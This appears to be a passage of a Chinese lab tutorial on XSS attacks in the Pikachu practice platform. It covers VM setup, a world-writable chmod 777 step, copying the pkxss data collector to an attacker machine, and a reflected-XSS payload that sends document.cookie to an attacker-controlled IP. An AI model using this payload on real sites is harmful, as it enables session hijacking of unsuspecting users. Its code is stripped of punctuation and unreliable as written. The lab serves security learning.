Pikachu-XSS漏洞实战：从Cookie窃取到键盘记录的攻防演练

1. XSS漏洞基础与Pikachu平台介绍跨站脚本攻击XSS是Web安全领域最常见的漏洞之一它允许攻击者在受害者的浏览器中执行恶意脚本。Pikachu漏洞演练平台是一个专为网络安全学习设计的开源项目它模拟了各种真实场景下的漏洞环境其中XSS模块尤其适合初学者理解攻击原理。我第一次接触Pikachu平台时就被它精心设计的交互式界面吸引了。与枯燥的理论讲解不同这个平台让你能亲手操作攻击流程。平台内置了反射型、存储型和DOM型三种XSS漏洞场景我们今天要重点演练的Cookie窃取、钓鱼攻击和键盘记录都是基于存储型XSS实现的。为什么选择Pikachu进行演练首先它的部署非常简单只需要PHP环境就能运行。其次所有攻击场景都做了安全隔离不会对真实系统造成影响。最重要的是它提供了完整的攻击链演示 - 从漏洞注入到数据窃取的全过程都能直观看到。记得我第一次成功获取到模拟的Cookie时那种原来攻击是这样发生的顿悟感正是这个平台的价值所在。2. 环境搭建与前期准备2.1 实验环境配置理想的演练环境需要两台虚拟机一台运行Pikachu靶场192.168.1.100另一台作为攻击机192.168.1.200。我推荐使用VirtualBox搭配Kali Linux和Windows 10的组合这样能模拟最真实的攻防场景。Pikachu的安装很简单下载源码包解压到Web目录即可但有几个关键点需要注意确保php.ini中allow_url_includeOn修改config.inc.php中的数据库配置给pkxss目录赋予写权限# 给Pikachu目录赋权 chmod -R 777 /var/www/html/Pikachu-master2.2 关键文件准备Pikachu平台最巧妙的设计是pkxss这个独立模块它包含了接收被盗数据的后台程序。我们需要把这个文件夹复制到攻击机上scp -r pkxss/ attacker192.168.1.200:/var/www/html/同时要修改几个关键文件中的IP地址指向攻击机pkxss/xcookie/cookie.phppkxss/xfish/fish.phppkxss/rkeypress/rk.js3. Cookie窃取实战演练3.1 GET型XSS获取Cookie我们先从最简单的反射型XSS开始。在Pikachu平台的XSS(reflected)模块输入以下payloadscript document.locationhttp://192.168.1.200/pkxss/xcookie/cookie.php?cookiedocument.cookie; /script这个脚本的原理很直接当页面加载时它会立即将当前用户的Cookie重定向发送到攻击者控制的服务器。我在测试时发现很多网站会过滤